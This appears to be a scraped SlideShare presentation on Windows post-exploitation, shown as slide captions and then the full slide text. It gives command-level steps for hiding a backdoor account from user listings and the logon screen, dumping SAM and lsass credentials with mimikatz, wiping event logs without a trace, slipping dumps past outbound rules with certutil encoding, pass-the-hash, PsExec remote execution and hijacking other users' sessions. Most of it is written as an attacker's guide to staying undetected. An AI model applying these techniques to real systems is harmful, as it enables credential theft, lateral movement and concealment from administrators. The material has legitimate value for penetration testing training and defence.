![Net User
Net user/s is a built-in Windows tool
that lists or manipulates all user
accounts. However, it will now list
special accounts.
Special accounts are those with ‘$’ at
the end of their name.
‘$’ can be added to an existing user
using wmic useraccount where
name=[username] call rename
name=[username]. Alternatively,
another new user can be added with ‘$’
at the end of its name.
3](https://image.slidesharecdn.com/windowspostexploitation-180625150438/85/Windows-post-exploitation-3-320.jpg)
![Logon Screen
Hiding special accounts from the logon
screen is a Windows built-in feature;
although it is not configured by default.
Configuring it can be done by adding
two new registry keys and a DWORD to
‘HKEY_LOCAL_MACHINESOFTWARE
MicrosoftWindows NTCurrentVersion
Winlogon’
• SpecialAccounts
• UserList
• [special account username] - with
data value ‘0’
4](https://image.slidesharecdn.com/windowspostexploitation-180625150438/85/Windows-post-exploitation-4-320.jpg)
![Token Impersonation
The following command can be used in
mimikatz to elevate to NT Authority
privileges:
• Privilege::debug – enables debug
privileges
• Log [filename] – logs the output of
mimikatz to a file for better
readability
• Token::elevate – elevates the current
privileges for dumping the lsass
• Token::whoami – checks privileges
that were indeed elevated
9](https://image.slidesharecdn.com/windowspostexploitation-180625150438/85/Windows-post-exploitation-9-320.jpg)
![Exporting the Dump
On the not-so-rare occasion the system
might be enforcing some outbound rules
regarding files, getting the lsass dump
might not be a straightforward task.
A great option to bypass the
“protection” is to use some more built-
in tools like certutil, which allows us to
easily encode and decode files.
Using certutil -encode [input file] [output
file] will result in a base64 encoded file
that will most likely bypass any
outbound rules.
15](https://image.slidesharecdn.com/windowspostexploitation-180625150438/85/Windows-post-exploitation-15-320.jpg)
![PTH
Passing the hash with mimikatz is done
with the command sekurlsa::pth
/user:[username] /domain:[domain]
/ntlm:[ntlm hash] /run:cmd
As seen in the example, when using the
newly spawned shell, we can both
authenticate with the server and
execute commands.
18](https://image.slidesharecdn.com/windowspostexploitation-180625150438/85/Windows-post-exploitation-18-320.jpg)
![PsExec
The psexec tool was designed to allow
execution of programs on remote
systems when dealing with privilege
escalation
Using the command structure PsExec.exe
[IP] -u [pcnameusername] -p
[password] [program] will execute the
command on the remote system.
Also, the program packs some more
features like running a program as NT
Authority, using the ‘-s’ flag, PsExec.exe -
s -i [program] .
19](https://image.slidesharecdn.com/windowspostexploitation-180625150438/85/Windows-post-exploitation-19-320.jpg)
![Session Hijacking
With NT Authority privileges, we can
now do even more than before,
including switching to a different user’s
session.
Using tscon [id] /dest:[current session
name] will immediately hijack the other
user’s session.
The same can be achieved by creating a
service with sc create [service name]
binpath= “cmd.exe /k tscon [id]
/dest:[current session name]” with net
start [service name].
20](https://image.slidesharecdn.com/windowspostexploitation-180625150438/85/Windows-post-exploitation-20-320.jpg)
Windows post exploitation
- 2. 2 Covering Tracks Unlike Linux systems, in Windows, not all processes are given special users. As a result, new, unfamiliar users will be much more easily detected by system administrators. Net user After creating a “backdoor” user on a Windows system machine, it is recommended to perform some extra operations to better hide this user from user listing tools. Logon Screen Even after hiding the user from listing tools, it will still appear on the logon screen and needs to be manually dealt with to insure it goes undetected.
- 3. Net User Net user/s is a built-in Windows tool that lists or manipulates all user accounts. However, it will now list special accounts. Special accounts are those with ‘$’ at the end of their name. ‘$’ can be added to an existing user using wmic useraccount where name=[username] call rename name=[username]. Alternatively, another new user can be added with ‘$’ at the end of its name. 3
- 4. Logon Screen Hiding special accounts from the logon screen is a Windows built-in feature; although it is not configured by default. Configuring it can be done by adding two new registry keys and a DWORD to ‘HKEY_LOCAL_MACHINESOFTWARE MicrosoftWindows NTCurrentVersion Winlogon’ • SpecialAccounts • UserList • [special account username] - with data value ‘0’ 4
- 5. 5 The Next Step Post Exploitation Post exploitation techniques are used to gain persistence on the system and to move the chain of command along. Although the local system has been taken, there is still the matter of going from local administrator to domain administrator. In order to do so, more data about the users on the system is needed. Below are useful targets for information gathering: TARGET DESCRIPTION SAM is a database storage file on Windows that stores users’ passwords, and is used to authenticate local and remote users. ntds.dit In a domain environment, instead of SAM database, the Active Directory is using the ntds.dit database in authentication lsass.exe a process in Windows responsible for authenticating users logging on. It also writes to the Windows Security Log.
- 6. 6 Lsass – SAM Relation Authentication Process The authentication process in Windows is done solely over encrypted NTLM transitions. Lsass will query SAM if a user with a certain hashed name and hashed password exists. On successful authentication, the user’s privileges will be downgraded, and he will be logged in. LSASS SAM does user ‘D7963BCBBA37514E9235E3DFDBDF8558’ with pass ‘3DBDE697D71690A769204BEB12283678’ exists? Yes / No The memory of all the authentication processes and logins exists on the system and contains the users’ credentials. On access, these hashes can be cracked for weak passwords or used for Pass-the-Hash in case of strong passwords.
- 7. Cracking Hashes Cracking weak passwords can be done with either online services or dedicated programs. ‘Hashkiller’ is an online service which may provide better and faster results due to larger databases and calculation speeds. ‘Cain & Able’ is a dedicated program which also supports loading hashes from a ‘SAM’ database directly. 7
- 8. Mimikatz Mimikatz is an open-source, post-exploitation tool with various modules allowing hash extraction, system patching, and more. Admin privileges require the use of mimikatz. Read from Memory Using the sekurlsa module, mimikatz, it is possible to elevate privileges to NT Authority. One may then access lsass, which is running as SYSTEM, and read its memory. Patch Windows Mimikatz can also be useful when covering tracks and clearing logs due to its event patching modules. Read Dump Mimikatz supports reading and analyzing lsass’s memory dumps, resulting in the option to analyze the data on a remote system. 8
- 9. Token Impersonation The following command can be used in mimikatz to elevate to NT Authority privileges: • Privilege::debug – enables debug privileges • Log [filename] – logs the output of mimikatz to a file for better readability • Token::elevate – elevates the current privileges for dumping the lsass • Token::whoami – checks privileges that were indeed elevated 9
- 10. Dumping lsass Dumping Mimikatz to dump the SAM databases content can be done with the following commands: lsadump::sam – dumps the content of the SAM database • sekurlsa::logonpasswords full – analyzes the NTLM passwords and tokens in the database. The sekurlsa can provide much more functionality with the sekurlsa module documented on mimikatz’s github page. 10
- 11. Clearing Logs An important step in post escalation is covering tracks. Deleting logs is a critical part, although it may be troublesome. Clearing all logs results in a new log; all other logs are deleted. Although not providing direct information, this deletion is also suspicious. 11
- 12. Patching Event Viewer Using mimikatz, it is possible to patch the event viewer in a way that will allow deleting all logs without a trace: • Event::drop – patches the event viewer to prevent log creation • Event::clear – clears all logs from the event log It is important to run the commands in this specific order. 12
- 13. Endpoint Protection When attempting to use mimikatz on an AV protected system, it will most likely be quickly detected due to mimikatz popularity. Disabling the AV might be a complication as well, if suspicions are raised. One solution is to extract the lsass dump manually and to examine it on a different station. 13
- 14. Manual Dumping Dumping lsass can be achieved via a completely legitimate Windows feature. It is possible to choose to dump lsass into a ‘.DMP’ file in ‘%temp%’ by right clicking 'process' in the Task Manager. 14
- 15. Exporting the Dump On the not-so-rare occasion the system might be enforcing some outbound rules regarding files, getting the lsass dump might not be a straightforward task. A great option to bypass the “protection” is to use some more built- in tools like certutil, which allows us to easily encode and decode files. Using certutil -encode [input file] [output file] will result in a base64 encoded file that will most likely bypass any outbound rules. 15
- 16. User Password Hashes In the following scenario, we appear to be an administrator on the local system but not in the domain. Trying to communicate or authenticate with the server results in login failure and permission errors. Luckily, the domain administrator seems to have been connected to our station at some point, most likely RDP, and his password hash was extracted with mimikatz. 16
- 17. 17 Bypassing Authentication The impersonation is possible due to a logical design flaw; the system is supposed to be more secure because no plain text is passed. At the same time, it allows an attacker to authenticate without actually knowing the password. Pass the Hash Because Windows authentication is done without using plain text passwords, decrypting the hashes is not required, and the hash itself can be used for authentication. Mimikatz Mimikatz allows a user to perform PTH or GT attacks with the sekurlsa and Kerberos modules. By spawning a new shell, which will authenticate with the appropriate ticket or hash, the user remains relatively hidden. Pass the Ticket This works the same way as PTH, but when dealing with Kerberos authentication, this attack is also known as the “golden ticket attack”. NTLM HASH
- 18. PTH Passing the hash with mimikatz is done with the command sekurlsa::pth /user:[username] /domain:[domain] /ntlm:[ntlm hash] /run:cmd As seen in the example, when using the newly spawned shell, we can both authenticate with the server and execute commands. 18
- 19. PsExec The psexec tool was designed to allow execution of programs on remote systems when dealing with privilege escalation Using the command structure PsExec.exe [IP] -u [pcnameusername] -p [password] [program] will execute the command on the remote system. Also, the program packs some more features like running a program as NT Authority, using the ‘-s’ flag, PsExec.exe - s -i [program] . 19
- 20. Session Hijacking With NT Authority privileges, we can now do even more than before, including switching to a different user’s session. Using tscon [id] /dest:[current session name] will immediately hijack the other user’s session. The same can be achieved by creating a service with sc create [service name] binpath= “cmd.exe /k tscon [id] /dest:[current session name]” with net start [service name]. 20